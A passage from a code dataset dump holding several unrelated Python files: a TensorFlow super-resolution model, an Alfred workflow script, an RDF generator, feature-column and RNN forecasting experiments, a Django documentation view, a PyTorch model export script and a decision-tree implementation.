SCx,SCy=y+va,x+va\n TCx,TCy=y-y,x-y\n FoCx,FoCy=x-y,y-y\n else:\n va=N-y\n FCx,FCy=x+va,y+va\n SCx,SCy=y+va,x+va\n TCx,TCy=y-x,x-x\n FoCx,FoCy=x-x,y-x\n K%=4\n if K==1:\n print(FCx,FCy)\n elif K==2:\n print(SCx,SCy)\n elif K==3:\n print(TCx,TCy)\n else:\n print(FoCx,FoCy)","sub_path":"Extras/Point Of Impact.py","file_name":"Point Of Impact.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"235558439","text":"\"\"\"\nThe core Boosting Network Model\n\"\"\"\n\nimport tensorflow as tf\nimport numpy as np\nfrom ops import *\n\n\nclass Net(object):\n\tdef __init__(self, hr, lr, non_local, wl, tower, reuse):\n\t\t# training inputset\n\t\tself.hr = hr\n\t\tself.lr = lr\n\t\t\n\t\t# multi-gpu related settings\n\t\tself.reuse = reuse\n\t\tself.tower = tower\n\t\t\n\t\t# parameter lists for weights and biases\n\t\tself.W_params = []\n\t\tself.b_params = []\n\t\t\n\t\t# coefficient of weight decay\n\t\tself.wl = wl\n\t\t\n\t\t# whether to enable the non-local block\n\t\tself.non_local = non_local\n\t\n\t\n\tdef dfus_block(self, bottom, i):\n\t\tact = tf.nn.relu\n\n\t\twith tf.variable_scope('dfus_block' + str(i), reuse=self.reuse):\n\t\t\tconv1 = act(conv2d(bottom, 64, [1, 1], wl=None, reuse=self.reuse, tower_index=self.tower, scope='conv' + str(i) + '_i'), name='relu' + str(i) + '_i')\n\n\t\t\tfeat1 = act(conv2d(conv1, 16, [3, 3], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv' + str(i) + '_1'), name='relu' + str(i) + '_1')\n\t\t\tfeat15 = act(conv2d(feat1, 8, [1, 1], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv' + str(i) + '_15'), name='relu' + str(i) + '_15')\n\n\t\t\tfeat2 = act(conv2d(conv1, 16, [3, 3], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv' + str(i) + '_2'), name='relu' + str(i) + '_2')\n\t\t\tfeat23 = act(conv2d(feat2, 8, [1, 1], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv' + str(i) + '_23'), name='relu' + str(i) + '_23')\n\n\t\t\tfeat = tf.concat([feat1, feat15, feat2, feat23], 3, name='conv' + str(i) + '_c1')\n\t\t\tfeat = act(conv2d(feat, 16, [1, 1], wl=None, reuse=self.reuse, tower_index=self.tower, scope='conv' + str(i) + '_r'), name='relu' + str(i) + '_r')\n\n\t\t\ttop = tf.concat([bottom, feat], 3, name='conv' + str(i) + '_c2')\n\n\t\treturn top\n\n\n\tdef ddfn(self, bottom, step, b=10):\n\t\tact = tf.nn.relu\n\n\t\twith tf.variable_scope('ddfn_' + str(step), reuse=self.reuse):\n\t\t\twith tf.name_scope('msfeat'):\n\t\t\t\tconv13 = act(conv2d(bottom, 16, [3, 3], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv1_3'), name='relu1_3')\n\t\t\t\tconv15 = act(conv2d(bottom, 16, [3, 3], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv1_5'), name='relu1_5')\n\n\t\t\t\tconv135 = act(conv2d(conv13, 16, [1, 1], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv1_3_5'), name='relu1_3_5')\n\t\t\t\tconv153 = act(conv2d(conv15, 16, [1, 1], wl=self.wl, reuse=self.reuse, tower_index=self.tower, scope='conv1_5_3'), name='relu1_5_3')\n\n\t\t\t\tconv1 = tf.concat([conv13, conv15, conv135, conv153], 3, name='conv1_c')\n\n\t\t\tif self.non_local:\n\t\t\t\tconv1, _ = non_local_block(conv1, reuse=self.reuse, tower_index=self.tower)\n\n\t\t\tfeat = self.dfus_block(conv1, 2)\n\n\t\t\tfor i in range(3, b, 1):\n\t\t\t\tfeat = self.dfus_block(feat, i)\n\n\t\t\ttop = feat\n\n\t\t\treturn top\n\t\n\t\n\tdef build_net(self):\n\t\twith tf.variable_scope('net', reuse=self.reuse):\n\t\t\tfeat0 = self.ddfn(self.lr, 0, b=60)\n\t\t\tfeat1 = self.ddfn(self.lr, 1, b=60)\n\t\t\tfeat2 = self.ddfn(self.lr, 2, b=60)\n\t\t\tfeat = tf.concat([feat0, feat1, feat2], axis=3)\n\t\t\t\n\t\t\toutputs = conv2d(feat, 31, [1, 1], W_init=tf.truncated_normal_initializer(mean=0.0, stddev=0.001),\n\t\t\t add_biases=True, wl=None, reuse=self.reuse, tower_index=self.tower, scope='fusion')\n\t\t\t\n\t\t\t#rrmse_loss = tf.reduce_mean(tf.sqrt(tf.pow(outputs - self.hr, 2)) / self.hr)\n\t\t\trrmse_loss = tf.reduce_mean(tf.abs(outputs - self.hr) / self.hr)\n\t\t\tself.total_loss = rrmse_loss\n","sub_path":"hscnn-d_clean/train/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"509127967","text":"# -*- coding: utf-8 -*-\n\nimport sys, os\n\nimport alfred\nalfred.setDefaultEncodingUTF8()\n\ndef get_exts(ext):\n template = os.listdir('./templates/')\n modules = map(list, map(os.path.splitext, template))\n exts = list(set(zip(*modules)[1]))\n rightExt = filter(lambda x: x.find(ext)==0, exts)\n rightExt.insert(0, ext)\n rightExt = list(set(rightExt))\n return rightExt\n\ndef get_template(ext, module):\n template = os.listdir('./templates/')\n modules = map(list, map(os.path.splitext, template))\n modulesForExt = filter(lambda x: x[1]==ext, modules)\n templateForExt = map(list, zip(*modulesForExt))\n if len(templateForExt)>0:\n templateForExt = templateForExt[0]\n templateForExt.insert(0,'')\n templateForExt = filter(lambda x: x.find(module)==0, templateForExt )\n templateForExt = filter(lambda x: x!= ext.replace('.', ''), templateForExt)\n else:\n templateForExt.insert(0,'')\n\n return templateForExt\n\ndef get_filename_module():\n out = sys.argv[1].split(' ')\n length = len(out)\n filename = ''\n module = ''\n if length >= 1:\n filename = out[0]\n if length >=2:\n filename = ' '.join(out[0:length-1])\n module = out[length-1]\n return filename, module\n\ndef get_feedback(filename, rightExts, templateForExt):\n basename, ext = os.path.splitext(filename)\n feedback = alfred.Feedback()\n\n addItem = lambda titleItem: feedback.addItem(\n title = 'Create New File: ' + titleItem,\n arg = titleItem,\n autocomplete = titleItem,\n# subtitle = titleItem,\n )\n\n if (filename == '') | (filename == '!'):\n if filename == '':\n feedback.addItem(\n title = 'Create New File',\n subtitle = 'Enter a filename and extension for your new file. Type ? for help.',\n )\n feedback.addItem(\n title = 'Open template folder',\n subtitle = 'Edit the template files',\n arg = '!',\n autocomplete = '!',\n icontype = 'fileicon',\n icon = 'templates'\n )\n return feedback\n\n if filename == '?':\n feedback.addItem(\n title = 'Go into Help',\n arg = '?'\n )\n return feedback\n\n if len(templateForExt) == 0:\n titleItem = filename\n addItem(titleItem)\n elif (templateForExt[0] == '') & (len(templateForExt) == 1):\n for i in rightExts:\n titleItem = basename+i\n addItem(titleItem)\n else:\n for i in templateForExt:\n titleItem = filename+ ' ' + i\n addItem(titleItem)\n\n return feedback\n\n\ndef main():\n filename, module = get_filename_module()\n basename, ext = os.path.splitext(filename)\n\n rightExts = get_exts(ext)\n templateForExt = get_template(ext, module)\n\n feedback = get_feedback(filename, rightExts, templateForExt)\n\n feedback.output()\n\nif __name__ == '__main__':\n main()\n","sub_path":"python/hzlzh_AlfredWorkflow.com/AlfredWorkflow.com-master/Sources/Workflows/CreateNewFile/express.py","file_name":"express.py","file_ext":"py","file_size_in_byte":3044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"172004482","text":"from rdflib import Graph, Literal, BNode, Namespace, RDF, URIRef, RDFS, Literal\nfrom rdflib.namespace import XSD\nimport json\nimport logging\nimport re\n\nOPENDATA = Namespace(\"http://opendata.cs.pub.ro/resource/\")\nOPENDATA_PROPERTY = Namespace(\"http://opendata.cs.pub.ro/property/\")\nDBPEDIA_PROPERTY = Namespace(\"http://dbpedia.org/property/\")\n\nlogging.basicConfig()\n\ndef parseJson(json, graph):\n\tfor entry in output_json:\n\t\tnume = entry[\"nume\"].replace(\"dr\", '').replace(\"Dr\", '').replace(\"DR\", '').replace(\".\", '')\n\t\tcontact = entry[\"contact\"]\n\t\tjudet = re.sub(r'\\s', '', contact[contact.find(\"(\")+1:contact.rfind(\")\")])\n\t\tlocalitate = re.sub(r'\\s', '', contact[:contact.rfind(\"(\")]).replace(\"\\\\\", '')\n\t\tif len(contact.split(',')) > 1:\n\t\t\ttelefon = ''.join(re.findall('\\d+', re.sub(r'\\s', '', contact.split(',')[1])))\n\t\telse:\n\t\t\ttelefon = \"\"\n\t\tloc_munca = entry[\"loc_munca\"]\n\t\tif loc_munca is not None:\n\t\t\tloc_munca = loc_munca.replace('\"', '').replace(\"'\", '').replace('|', '').replace(\" \", \"_\")\n\t\tspecialitate = entry[\"specialitate\"]\n\t\tdoctor = URIRef(OPENDATA[re.sub(r'\\s', '', nume)])\n\n\t\tgraph.add((doctor, RDF.type, URIRef(\"http://dbpedia.org/ontology/Person\")))\n\t\tgraph.add((doctor, RDFS.label, Literal(nume, datatype=XSD.string)))\n\t\tgraph.add((doctor, OPENDATA_PROPERTY[\"specializare\"], Literal(specialitate, datatype=XSD.string)))\n\t\tgraph.add((doctor, OPENDATA_PROPERTY[\"loc_munca\"], URIRef(OPENDATA[loc_munca])))\n\t\tgraph.add((doctor, OPENDATA_PROPERTY[\"loc_munca_judet\"], URIRef(OPENDATA[judet + \"_Judet\"])))\n\t\tgraph.add((doctor, OPENDATA_PROPERTY[\"loc_munca_localitate\"], URIRef(OPENDATA[localitate + \"_judet_\" + judet])))\n\t\tgraph.add((doctor, DBPEDIA_PROPERTY[\"telefon\"], Literal(telefon, datatype=XSD.string)))\n\ngraph = Graph()\n\nwith open('docs_info.json') as json_data:\n\toutput_json = json.load(json_data)\n\tparseJson(output_json, graph)\nwith open('docplanner.json') as json_data:\n\toutput_json = json.load(json_data)\n\tparseJson(output_json, graph)\n\ngraph.serialize(\"output.rdf\", format='xml', encoding='utf-8')\n\n","sub_path":"Doctor/rdf/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"602079203","text":"# coding: utf-8\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport os\n\nnp.set_printoptions(threshold=np.inf)\nprint(tf.__version__)\n\n_CSV_COLUMNS = [\n 'age', 'workclass', 'fnlwgt', 'education', 'education_num',\n 'marital_status', 'occupation', 'relationship', 'race', 'gender',\n 'capital_gain', 'capital_loss', 'hours_per_week', 'native_country',\n 'income_bracket'\n]\n_CSV_COLUMN_DEFAULTS = [[0], [''], [0], [''], [0], [''], [''], [''], [''], [''],\n [0], [0], [0], [''], ['']]\ndata_file=\"F:\\\\notebook\\\\data\\\\csv_test\\\\adult.data\"\ntrain_data_pd = pd.read_csv(data_file,names=_CSV_COLUMNS)#,header=0)\ntrain_data_pd.loc[0]\n\ndef parse_csv(value):\n columns = tf.decode_csv(value,record_defaults=_CSV_COLUMN_DEFAULTS)\n# print(\"\\n columns=\",columns)\n features = dict(zip(_CSV_COLUMNS,columns))\n# print(\"\\n features=\",features)\n labels = features.pop('income_bracket')\n# print(\"\\n labels=\",labels)\n classes = tf.equal(labels,'>50K')\n# print(\"\\n classed=\",classes)\n return features,classes\ntest_line = parse_csv(\"39,State-gov,77516,Bachelors,13,Never-married,Adm-clerical,Not-in-family,White,Male,2174,0,40,United-States,<=50K\")\nwith tf.Session() as session:\n test_line_run = session.run(test_line)\n print(test_line_run)\n\ndef get_next():\n dataset_text = tf.data.TextLineDataset(data_file)\n dataset_text = dataset_text.map(parse_csv, num_parallel_calls=5)\n dataset_text = dataset_text.repeat(1)\n dataset_text = dataset_text.batch(20)\n iterator = dataset_text.make_one_shot_iterator()\n x,y=iterator.get_next()\n# print(\"x=\",x)\n# print(\"y=\",y)\n return x,y\n\t\nx,y=get_next()\n\nwith tf.Session() as session:\n x_value,y_value = session.run([x,y])\n print(\"x_value=\",x_value)\n print(\"x_value[age]=\",x_value['age'])\n print(\"y_value=\",y_value)\n\nage_fc = tf.feature_column.numeric_column('age')\neducation_num_fc = tf.feature_column.numeric_column('education_num')\neducation_fc = tf.feature_column.categorical_column_with_vocabulary_list(\n 'education', [\n 'Bachelors', 'HS-grad', '11th', 'Masters', '9th', 'Some-college',\n 'Assoc-acdm', 'Assoc-voc', '7th-8th', 'Doctorate', 'Prof-school',\n '5th-6th', '10th', '1st-4th', 'Preschool', '12th'])\neduction_fc_dense = tf.feature_column.indicator_column(education_fc)\n\ncross_fc_edu_occ = tf.feature_column.crossed_column(\n ['education', 'occupation'], hash_bucket_size=30)\ncross_fc_edu_occ_dense = tf.feature_column.indicator_column(cross_fc_edu_occ)\n\nrelationship_fc_dense = tf.feature_column.indicator_column(\n tf.feature_column.categorical_column_with_vocabulary_list(\n 'relationship', [\n 'Husband', 'Not-in-family', 'Wife', 'Own-child', 'Unmarried',\n 'Other-relative'])\n)\n\n\nfeatures = x\nfc_list= []\n\nfc_list.append(relationship_fc_dense)\nfc_list.append(eduction_fc_dense)\nfc_list.append(education_num_fc)\nfc_list.append(age_fc)\nfc_list.append(cross_fc_edu_occ_dense)\nprint(fc_list)\nnet = tf.feature_column.input_layer(features,fc_list)\n#顺序与原始数据有关,排在前面的还是会出现在前面\n# Items of feature_columns must be a _DenseColumn. \n# You can wrap a categorical column with an embedding_column or indicator_column\n\nwith tf.Session() as session:\n session.run(tf.tables_initializer())\n print(session.run(net))\n\n","sub_path":"the_second_base_model/feature_column_test.py","file_name":"feature_column_test.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"545803075","text":"from .calaccess_forms import FormList, FormDetail\nfrom .calaccess_official import OfficialDocumentation\nfrom .calaccess_files import FileList, FileDetail, FileDownloadsList\nimport calaccess_raw\nfrom django.urls import reverse\nfrom bakery.views import BuildableTemplateView\nfrom calaccess_raw.annotations.filing_forms import all_filing_forms\n\n\nclass DocumentationIndex(BuildableTemplateView):\n \"\"\"\n An index page for linking to all of our documentation sections\n \"\"\"\n build_path = \"documentation/index.html\"\n template_name = \"calaccess_website/documentation_index.html\"\n\n def get_context_data(self):\n model_list = calaccess_raw.get_model_list()\n form_list = all_filing_forms\n object_list = [\n dict(\n name='CAL-ACCESS files',\n description=\"Definitions, record layouts and data dictionaries for the {} \\\nCAL-ACCESS files released by the state.\".format(len(model_list)),\n url=reverse(\"file_list\"),\n ),\n dict(\n name='CAL-ACCESS forms',\n description=\"Descriptions, samples and other documentation for \\\nthe {} forms that campaigns and lobbyists use to disclose activity to the state.\".format(len(form_list)),\n url=reverse(\"form_list\"),\n ),\n dict(\n name='CAL-ACCESS official documentation',\n description=\"The jumbled, fragmentary and unreliable documentation \\\nfor the CAL-ACCESS database provided by California's Secretary of State. For more authoritative \\\ninformation, refer to our materials.\",\n url=reverse(\"official_documentation\"),\n ),\n dict(\n name='CCDC technical documentation',\n description=\"Technical documentation for the collection of \\\nCalifornia Civic Data Coalition applications that power this site.\",\n url=\"http://django-calaccess.californiacivicdata.org\"\n ),\n dict(\n name=\"Frequently asked questions\",\n description=\"Answers to common questions about this project and the underlying CAL-ACCESS database.\",\n url=reverse(\"faq\"),\n ),\n ]\n return {\n 'object_list': object_list\n }\n\n\nclass FAQ(BuildableTemplateView):\n \"\"\"\n Frequently asked questions.\n \"\"\"\n build_path = \"documentation/frequently-asked-questions/index.html\"\n template_name = \"calaccess_website/faq_detail.html\"\n\n\n__all__ = (\n 'DocumentationIndex',\n 'FAQ',\n 'FormList',\n 'FormDetail',\n 'FileList',\n 'FileDetail',\n 'FileDownloadsList',\n 'OfficialDocumentation',\n)\n","sub_path":"calaccess_website/views/docs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"284235091","text":"import tensorflow as tf\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef plot_series(time, series, format=\"-\", start=0, end=None):\n plt.plot(time[start:end], series[start:end], format)\n plt.xlabel(\"Time\")\n plt.ylabel(\"Value\")\n plt.grid(True)\n\ndef trend(time, slope=0):\n return slope * time\n\ndef seasonal_pattern(season_time):\n \"\"\"Just an arbitrary pattern, you can change it if you wish\"\"\"\n return np.where(season_time < 0.4,\n np.cos(season_time * 2 * np.pi),\n 1 / np.exp(3 * season_time))\n\ndef seasonality(time, period, amplitude=1, phase=0):\n \"\"\"Repeats the same pattern at each period\"\"\"\n season_time = ((time + phase) % period) / period\n return amplitude * seasonal_pattern(season_time)\n\ndef noise(time, noise_level=1, seed=None):\n rnd = np.random.RandomState(seed)\n return rnd.randn(len(time)) * noise_level\n\ntime = np.arange(4 * 365 + 1, dtype=\"float32\")\nbaseline = 10\nseries = trend(time, 0.1) \nbaseline = 10\namplitude = 40\nslope = 0.05\nnoise_level = 5\n\n# Create the series\nseries = baseline + trend(time, slope) + seasonality(time, period=365, amplitude=amplitude)\n# Update with noise\nseries += noise(time, noise_level, seed=42)\n\nsplit_time = 1000\ntime_train = time[:split_time]\nx_train = series[:split_time]\ntime_valid = time[split_time:]\nx_valid = series[split_time:]\n\nwindow_size = 20\nbatch_size = 32\nshuffle_buffer_size = 1000\n\ndef windowed_dataset(series,batch_size,shuffle_buffer_size,window_size):\n df=tf.data.Dataset.from_tensor_slices(series)\n df=df.window(window_size+1,shift=1,drop_remainder=True)\n df=df.flat_map(lambda window:window.batch(window_size+1))\n df=df.shuffle(shuffle_buffer_size).map(lambda window:(window[:-1],window[-1]))\n df=df.batch(batch_size).prefetch(1)\n return df\n\n\ntrain_set=windowed_dataset(series,32,1000,20)\nmodel=tf.keras.Sequential()\nmodel.add(tf.keras.layers.Lambda(lambda x:tf.expand_dims(x,axis=-1)))\nmodel.add(tf.keras.layers.SimpleRNN(40,return_sequences=True))\nmodel.add(tf.keras.layers.SimpleRNN(40))\nmodel.add(tf.keras.layers.Dense(1))\nmodel.add(tf.keras.layers.Lambda(lambda x:x*100))\nmodel.summary()\nlr_schedule=tf.keras.callbacks.LearningRateScheduler(lambda epoch:1e-8*10**(epoch/20))\noptimizer=tf.keras.optimizers.SGD(lr=2e-6,momentum=0.9)\nmodel.compile(loss=tf.keras.losses.Huber(),optimizer=optimizer,metrics=[\"mae\"])\n\nhistory=model.fit(train_set,epochs=50)\n\nplt.semilogx(history.history['lr'],history.history['loss'])\n\nforecast=[]\nfor time in range(len(series)-window_size):\n forecast.append(model.predict(series[time:time+window_size][np.newaxis]))\n\nforecast=forecast[split_time-window_size:]\n\nresults=np.array(forecast)[:,0,0]\n\nplot_series(time_valid, x_valid)\nplot_series(time_valid, results)\n\n\ntf.keras.metrics.mean_absolute_error(x_valid, results).numpy()","sub_path":"TimeSeriesForecast_with_RNN.py","file_name":"TimeSeriesForecast_with_RNN.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"473298756","text":"from pymodel.model import get_model\nimport argparse \nimport torch\nimport cv2\nimport torchvision.transforms as transforms\nfrom PIL import Image\n\ndef getargs():\n parser = argparse.ArgumentParser()\n parser.add_argument('save', help='出力ファイルパス')\n parser.add_argument('--model', default='resnet18', choices=['resnet18', 'resnet50', 'mobilenet_v2'], help='変換するモデル')\n parser.add_argument('--src', help='テスト用の画像データ')\n return parser.parse_args()\n\ndef preprocess(image):\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) \n preprocess = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n normalize\n ])\n return preprocess(image)\n \n\ndef main():\n args = getargs()\n print('Create Model...')\n model = get_model(args.model)\n model = model.eval()\n model = model.cuda()\n print('Model Created!!')\n\n if args.src is not None:\n image = Image.open(args.src)\n else:\n image = None\n if image is not None:\n print('Crop Size')\n image = preprocess(image)\n image = image.unsqueeze(0)\n image = image.cuda()\n scores = model(image)\n indices = scores.argmax(dim=1)\n index = indices[0].item()\n print(index, scores[0, index].item())\n\n dummy = torch.zeros([1, 3, 224, 224], dtype=torch.float32).cuda()\n pt_model = torch.jit.trace(model, dummy)\n pt_model.save(args.save)\n\nif __name__ == '__main__':\n main()","sub_path":"buildmodel.py","file_name":"buildmodel.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"343515344","text":"import nltk\nimport matplotlib.pyplot as plt \n\ndef extract_sentences(filename):\n\tscript = open(filename, \"r\")\n\tscript_lines = script.readlines()\n\tspeaker_dict = {}\n\tfor line in script_lines:\n\t\tlines_list = line.split()\n\t\tif lines_list:\n\t\t\trange1 = 0\n\t\t\tfor i in range(len(lines_list)):\n\t\t\t\tif \":\" in lines_list[i]: #Find word with \":\" \n\t\t\t\t\tspeaker = lines_list[:i+1]\n\t\t\t\t\trange1 = i+1\n\t\t\tspeaker = ' '.join(speaker)\n\t\t\tspeaker1 = speaker[:len(speaker) - 1]\n\t\t\tsents = ' '.join(lines_list[range1:])\n\t\t\tsent_list = nltk.sent_tokenize(sents)\n\t\t\ttry:\n\t\t\t\tfor s in sent_list:\n\t\t\t\t\tspeaker_dict[speaker1].append(s)\n\t\t\texcept KeyError:\n\t\t\t\tspeaker_dict[speaker1] = sent_list\n\treturn speaker_dict\n\nout_dict = extract_sentences(\"rag_script.txt\")\nlengths = {}\nfor key in out_dict:\n\tfor val in out_dict[key]:\n\t\tval = val.split()\n\t\tleng = len(val)\n\t\ttry:\n\t\t\tlengths[leng] += 1\n\t\texcept KeyError:\n\t\t\tlengths[leng] = 1\nlength = lengths.keys()\ncounts = lengths.values()\nplt.bar(length,counts)\nplt.xlabel(\"LENGTHS\")\nplt.ylabel(\"FREQUENCIES\")\nplt.savefig(\"LengthsDistribution.png\")\nplt.show()\n","sub_path":"parsing/LenDist.py","file_name":"LenDist.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"608534932","text":"# 100 ile 150 arasındaki asal sayılar;\n\nliste = []\nfor i in range(100,150+1):\n for t in range(2,100):\n if(i % t == 0):\n break\n else:\n liste.append(i)\n\nprint(\"100 ile 150 arası asal sayilar :\",liste)","sub_path":"100-150_asal_sayilar.py","file_name":"100-150_asal_sayilar.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"13505541","text":"import copy\nimport random\nimport sys\n\nimport numpy as np\nimport pandas as pd\nimport csv\nimport defaultdict\nimport os\nimport argparse\nimport glob\n\n\n\n\"\"\"\n\nCalculate Variance Gain for a particular attribute\n\n\"\"\"\n\ndef calculateVarianceGain(dataset, splitAttributeName, targetName=\"Class\",varianceGain=0.0):\n datasetVariance = calculateVarianceImpurity(dataset[targetName])\n typeOfValues, counts = np.unique(dataset[splitAttributeName], return_counts=True)\n sumOfCounts = np.sum(counts)\n splitVariance = [\n calculateVarianceImpurity(dataset.where(dataset[splitAttributeName] == typeOfValues[i]).dropna()[targetName])\n for i in range(len(typeOfValues))]\n splitVarianceSum = np.sum([(counts[i] / sumOfCounts) * splitVariance[i] for i in range(len(typeOfValues))])\n varianceGain = datasetVariance - splitVarianceSum\n return varianceGain\n\n\"\"\"\n\nCalculate the entropy of a particular column\n\n\"\"\"\n\ndef calculateEntropy(targetColumn, entropy=0.0):\n typeOfValues, counts = np.unique(targetColumn, return_counts=True)\n sumOfCounts = np.sum(counts)\n countToTotals = [counts[i] / sumOfCounts for i in range(len(typeOfValues))]\n entropy = np.sum([-countToTotal * (np.log2(countToTotal)) for countToTotal in countToTotals])\n return entropy\n\n\n\n\n\"\"\"\n \n Calculate the Variance Impurity according to Given Formula\n\n\"\"\"\n\ndef calculateVarianceImpurity(targetColumn, variance=0.0):\n typeOfValues, counts = np.unique(targetColumn, return_counts=True)\n sumOfCounts = np.sum(counts)\n countToTotals = [counts[i] / sumOfCounts for i in range(len(typeOfValues))]\n variance = np.prod(countToTotals)\n return variance\n\n\"\"\"\n \n Update the Decision tree with new attributes\n\n\"\"\"\ndef update(tree, targetKey, dataset):\n for key, value in tree.items():\n if key == targetKey:\n prominentIndex = np.argmax(np.unique(dataset[key], return_counts=True)[1])\n prominentClass = np.unique(dataset[key])[prominentIndex]\n tree[key] = prominentClass\n break\n elif isinstance(value, dict):\n update(value, targetKey, dataset)\n return tree\n\n\n\n\"\"\"\n \n Predict the classification for a particular query\n \n\"\"\"\ndef predictClassification(query, tree, default,result=0):\n for key in list(query.keys()):\n if key in list(tree.keys()):\n try:\n result = tree[key][query[key]]\n except:\n return default\n result = tree[key][query[key]]\n if isinstance(result, dict):\n return predictClassification(query, result, default)\n else:\n return result\n\n\n\"\"\"\n\nBuild the decision tree\n\n\"\"\"\ndef decisionTree(partialDataset, originalDataset, attributes, type, targetName=\"Class\", parentClass=None):\n if len(np.unique(partialDataset[targetName])) <= 1:\n return np.unique(partialDataset[targetName])[0], None\n elif len(partialDataset) == 0:\n maxElementIndex = np.argmax(np.unique(originalDataset[targetName], return_counts=True)[1])\n return np.unique(originalDataset[targetName])[maxElementIndex], None\n # Need to check\n elif len(attributes) == 0:\n return parentClass, None\n else:\n parentClassIndex = np.argmax(np.unique(partialDataset[targetName], return_counts=True)[1])\n parentClass = np.unique(partialDataset[targetName])[parentClassIndex]\n\n if type == 1:\n attributesInformationGain = [calculateInformationGain(partialDataset, atrribute, targetName) for atrribute\n in\n attributes]\n else:\n attributesInformationGain = [calculateVarianceGain(partialDataset, atrribute, targetName) for atrribute in\n attributes]\n most_gain_index = np.argmax(attributesInformationGain)\n bestAttribute = attributes[most_gain_index]\n\n root = dict()\n root[bestAttribute] = dict()\n printDecisionTreeTree = dict()\n attributes = [atrribute for atrribute in attributes if atrribute is not bestAttribute]\n\n for decision in np.unique(partialDataset[bestAttribute]):\n # print(\"Desicion : \"+str(decision)+\" \"+str(bestAttribute))\n sub_data = partialDataset.where(partialDataset[bestAttribute] == decision).dropna()\n sub_tree = decisionTree(sub_data, originalDataset, attributes, type, targetName, parentClass)\n root[bestAttribute][decision] = sub_tree[0]\n printDecisionTreetreeTuple = (bestAttribute, decision)\n if isinstance(sub_tree[0], dict):\n printDecisionTreeTree[printDecisionTreetreeTuple] = sub_tree[1]\n else:\n printDecisionTreeTree[printDecisionTreetreeTuple] = sub_tree[0]\n return root, printDecisionTreeTree\n\n\n\n\n\"\"\"\n\nGet the Non-Leaf Node in a tree\n\n\"\"\"\n\ndef getNonLeafNode(tree, nonLeafList):\n for key, value in tree.items():\n if isinstance(value, dict):\n if type(key) is str:\n nonLeafList.append(key)\n getNonLeafNode(value, nonLeafList)\n return nonLeafList\n\n\"\"\"\n \n Post Prune the decision tree\n \n\"\"\"\n\ndef runPostPruning(L, K, tree, dataset, default):\n treeBest = copy.deepcopy(tree)\n treeBestAccuracy = getAccuracyofTestDataset(dataset, treeBest, default)\n for i in range(L):\n dtree = copy.deepcopy(tree)\n m = random.randint(0, K)\n for j in range(m):\n nonLeafList = list()\n non_leaf = getNonLeafNode(dtree, nonLeafList)\n if len(non_leaf):\n p = random.randint(0, len(non_leaf) - 1)\n targetElement = non_leaf[p]\n dtree = update(dtree, targetElement, dataset)\n if dtree:\n dtreeAccuracy = getAccuracyofTestDataset(dataset, dtree, default)\n if dtreeAccuracy > treeBestAccuracy:\n treeBest = copy.deepcopy(dtree)\n treeBestAccuracy = dtreeAccuracy\n return treeBest\n\n\"\"\"\n \n Print the decision tree\n \n\"\"\"\ndef printDecisionTree(tree, depth=0, accept=\"yes\"):\n if depth == 0:\n print('TREE Visualization \\n')\n \n for index, splitCriterion in enumerate(tree):\n subTrees = tree[splitCriterion]\n print('|\\t' * depth, end='')\n variable = str(splitCriterion[0]).split('.')[0]\n value = str(splitCriterion[1]).split('.')[0]\n if type(subTrees) is dict:\n print('{0} = {1}:'.format(variable, value))\n else:\n subTrees = str(subTrees).split('.')[0]\n print('{0} = {1}:{2}'.format(variable, value, subTrees))\n if type(subTrees) is dict:\n printDecisionTree(subTrees, depth + 1)\n\n\n\"\"\"\n \n Calculate the information Gain of a particular attribute\n \n\"\"\"\ndef calculateInformationGain(dataset, splitAttributeName, targetName=\"Class\",informationGain=0.0):\n datasetEntropy = calculateEntropy(dataset[targetName])\n typeOfValues, counts = np.unique(dataset[splitAttributeName], return_counts=True)\n sumOfCounts = np.sum(counts)\n splitEntropy = [\n calculateEntropy(dataset.where(dataset[splitAttributeName] == typeOfValues[i]).dropna()[targetName]) for i in\n range(len(typeOfValues))]\n splitEntropySum = np.sum([(counts[i] / sumOfCounts) * splitEntropy[i] for i in range(len(typeOfValues))])\n informationGain = datasetEntropy - splitEntropySum\n return informationGain\n\n\n\n\n\n\n\"\"\"\n\nTest the accuracyof the test set\n\n\"\"\"\ndef getAccuracyofTestDataset(dataset, tree, default,accuracy=0.0):\n testDict = dataset.iloc[:, :-1].to_dict(orient=\"records\")\n predicted = pd.DataFrame(columns=[\"predict\"])\n for i in range(len(dataset)):\n predicted.loc[i, \"predict\"] = predictClassification(testDict[i], tree, default)\n accuracy = (np.sum(predicted[\"predict\"] == 